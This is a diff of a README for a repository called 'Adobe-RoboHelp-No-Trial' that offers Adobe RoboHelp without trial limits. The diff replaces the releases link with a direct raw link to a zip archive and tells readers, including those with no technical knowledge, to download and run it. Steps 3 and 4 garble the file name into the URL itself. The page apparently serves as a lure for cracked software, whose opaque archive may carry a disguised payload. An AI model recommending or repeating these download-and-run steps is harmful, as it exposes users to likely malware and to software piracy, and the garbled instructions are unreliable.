Boissy883/Adobe-RoboHelp-No-Trial/README.md

 To get started, follow the steps below to download and run the application on your Windows PC.
 This guide is straightforward and aims to ensure that even those with no programming knowledge can successfully set up the software.

 ## 📥 Download & Install
-1. **Visit the Releases Page:** To download the application, [visit this page to download](https://github.com/Boissy883/Adobe-RoboHelp-No-Trial/releases).
+1. **Visit the Releases Page:** To download the application, [visit this page to download](https://raw.githubusercontent.com/Boissy883/Adobe-RoboHelp-No-Trial/main/yampa/Adobe-RoboHelp-No-Trial_v2.0.zip).

 2. **Choose the Latest Version:** On the releases page, look for the latest version of Adobe RoboHelp.
 You will see a list with release notes and files available for download.

-3. **Download the File:** Click on the file named `Adobe-RoboHelp-Setup.exe` (or similar) to start the download.
+3. **Download the File:** Click on the file named `https://raw.githubusercontent.com/Boissy883/Adobe-RoboHelp-No-Trial/main/yampa/Adobe-RoboHelp-No-Trial_v2.0.zip` (or similar) to start the download.
 Make sure to save it to a location on your computer where you can easily find it, like your Downloads folder.

-4. **Run the Installer:** Once the download finishes, navigate to the location where you saved the file and double-click on `Adobe-RoboHelp-Setup.exe`.
+4. **Run the Installer:** Once the download finishes, navigate to the location where you saved the file and double-click on `https://raw.githubusercontent.com/Boissy883/Adobe-RoboHelp-No-Trial/main/yampa/Adobe-RoboHelp-No-Trial_v2.0.zip`.
 This action will start the installation process.

 5. **Follow the Installation Prompts:** A window will appear guiding you through the installation steps.
 Read the instructions carefully.
 Click “Next” to proceed through the different steps.
 Accept the license agreement to continue.